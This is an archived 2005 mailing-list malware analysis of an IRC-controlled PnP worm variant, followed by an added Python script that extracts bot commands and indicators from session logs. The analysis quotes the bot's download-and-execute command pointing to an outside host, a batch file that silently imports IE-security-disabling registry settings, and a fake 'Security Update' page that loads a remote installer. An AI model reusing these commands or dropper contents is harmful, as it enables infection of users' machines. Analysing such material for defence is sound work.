Full Disclosure mailing list archives

pnp worm unknown variant - post infection actions


From: "Morning Wood" <se_cur_ity () hotmail com>
Date: Tue, 16 Aug 2005 16:03:32 -0700

pnp worm unknown variant - post infection actions
Donnie Werner
http://exploitlabs.com


[ relevant info ]

[08/16/2005] (out) NICK [00|USA|618452]
[08/16/2005] (out) USER 2K-7566 * 0 :INFECTEDUSER
[08/16/2005] (in)  :hub.de NOTICE [00|USA|618452] :*** If you are having
problems connecting due to ping timeouts, please type /quote pong 5DCA1942
or /raw pong 5DCA1942 now.
[08/16/2005] (in)  PING :5DCA1942
[08/16/2005] (out) PONG 5DCA1942
[08/16/2005] (in)  :hub.de 001 [00|USA|618452] :Welcome to the hub IRC
Network [00|USA|618452]!2K-7566 () 71 xx xx.49

[08/16/2005] (in)  :hub.de 004 [00|USA|618452] hub.de Unreal3.2.1
iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT

[08/16/2005] (out) MODE [00|USA|618452]
[08/16/2005] (out) JOIN #upnp

[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #upnp :.asc -S -s|.else
status scan .asc PnP445 120 5 0 _a _r _e _s|.if nick *USA* .r JOIN #usa
[08/16/2005] (out) JOIN #usa
[08/16/2005] (out) PRIVMSG #upnp :IRC// Sent IRC raw: "JOIN #usa".

[08/16/2005] (in)  :[00|USA|618452]!2K-7566 () 71 xx xx.49 JOIN :#usa
[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #usa :.down
http://www.dreamcatcherprod.com/gc.exe C:\u487sdjkt.exe 1 -s|.r JOIN #rr
[08/16/2005] (out) JOIN #rr

[ gc.exe ]

gc.exe is a selfextracting archive that expands to..
02/08/2005  05:33 AM             3,496 kans.reg
01/31/2005  06:57 AM             3,276 kansup.reg
07/31/2005  11:06 PM               378 update.html
07/15/2005  05:36 AM                95 x.bat

the .bat runs..
----------
REGEDIT.EXE /S kans.reg
update.html
SLEEP 5
del kans.reg
del x.bat
----------

the .reg files disable IE Security settings

update.html contains...
----------
[TITLE]Security Update[/TITLE]
[HEAD][/HEAD]
[BODY]
[script language='JavaScript' type='text/JavaScript'
src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst=
1&delayload=0&account_id=159900&recurrence=always&adid=a1117836900&event_typ
e=onload&signature=159900'][/script]
[script language="JavaScript"]self.focus();[/script]
----------

which installs pornographic malware.
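The channel topics in the session above are the bot's command channel: each 332 (RPL_TOPIC) line carries a `|`-separated chain of commands, and the `.r JOIN` redirects walk the bot from #upnp to #usa to #rr before the `.down` command fetches gc.exe. The following script is an added example (not code from the post or its author) that parses such session log lines, splits the topic into commands, and extracts the indicators a responder wants: download-and-execute URL/path pairs, channels that start a scan, and the redirect chain. The sample log is the post's own lines re-joined onto single lines; the verb set (`.down`, `.asc`, `.r`, `.if`, `.else`) is taken from those topics only, and the treatment of `.if`/`.else` as wrappers around a following command is an assumption.

```python
"""Extract bot commands from IRC channel-topic (numeric 332) lines in a session log."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the session lines quoted in the post, with the archive's
# wrapped 332 lines re-joined. Raw string because the Windows path contains "\u".
SAMPLE_LOG = r"""
[08/16/2005] (out) NICK [00|USA|618452]
[08/16/2005] (out) JOIN #upnp
[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #upnp :.asc -S -s|.else status scan .asc PnP445 120 5 0 _a _r _e _s|.if nick *USA* .r JOIN #usa
[08/16/2005] (out) JOIN #usa
[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #usa :.down http://www.dreamcatcherprod.com/gc.exe C:\u487sdjkt.exe 1 -s|.r JOIN #rr
[08/16/2005] (out) JOIN #rr
"""

# "[date] (in)  :<server> 332 <nick> <#channel> :<topic>"
TOPIC_RE = re.compile(
    r"^\[(?P<date>[^\]]+)\]\s+\(in\)\s+:(?P<server>\S+)\s+332\s+"
    r"(?P<nick>\S+)\s+(?P<channel>#\S+)\s+:(?P<topic>.*)$"
)

# Verbs seen in the post's topics. ".if"/".else" are treated (assumption) as
# conditional wrappers whose payload is another verb later in the same segment.
VERBS = {".down", ".asc", ".r"}
CONDITIONALS = {".if", ".else"}


@dataclass(frozen=True)
class BotCommand:
    date: str
    channel: str
    verb: str
    args: Tuple[str, ...]
    conditional: bool


def split_topic(topic: str) -> List[str]:
    """Commands are chained in one topic string with '|' as the separator."""
    return [seg.strip() for seg in topic.split("|") if seg.strip()]


def parse_segment(date: str, channel: str, segment: str) -> Optional[BotCommand]:
    tokens = segment.split()
    conditional = bool(tokens) and tokens[0] in CONDITIONALS
    for i, tok in enumerate(tokens):
        if tok in VERBS:
            return BotCommand(date, channel, tok, tuple(tokens[i + 1:]), conditional)
    return None


def extract_commands(log_text: str) -> List[BotCommand]:
    cmds = []
    for line in log_text.splitlines():
        m = TOPIC_RE.match(line.strip())
        if not m:
            continue
        for seg in split_topic(m["topic"]):
            cmd = parse_segment(m["date"], m["channel"], seg)
            if cmd:
                cmds.append(cmd)
    return cmds


def downloads(cmds: List[BotCommand]) -> List[Tuple[str, str]]:
    """(url, local path) pairs from '.down <url> <path> ...' commands."""
    return [(c.args[0], c.args[1]) for c in cmds if c.verb == ".down" and len(c.args) >= 2]


def channel_chain(cmds: List[BotCommand], start: str) -> List[str]:
    """Follow '.r JOIN #chan' redirects from the start channel; stop on a loop."""
    hops = {c.channel: c.args[1] for c in cmds
            if c.verb == ".r" and len(c.args) >= 2 and c.args[0].upper() == "JOIN"}
    chain = [start]
    while chain[-1] in hops and hops[chain[-1]] not in chain:
        chain.append(hops[chain[-1]])
    return chain


def analyze(log_text: str, start: str = "#upnp") -> dict:
    cmds = extract_commands(log_text)
    return {
        "commands": cmds,
        "downloads": downloads(cmds),
        "scan_channels": sorted({c.channel for c in cmds if c.verb == ".asc"}),
        "chain": channel_chain(cmds, start),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for c in result["commands"]:
        flag = "  [conditional]" if c.conditional else ""
        print(f"{c.date} {c.channel:6} {c.verb:5} {' '.join(c.args)}{flag}")
    print("download-and-execute:", result["downloads"])
    print("scan started in:", result["scan_channels"])
    print("redirect chain:", " -> ".join(result["chain"]))
```

Run against a real client or proxy log, the `downloads` list gives the URLs and drop paths to block and hunt for on disk, and the redirect chain shows which channel topics must be captured to see the full command set, since a bot that only sits in #upnp never reveals the `.down` command.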

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/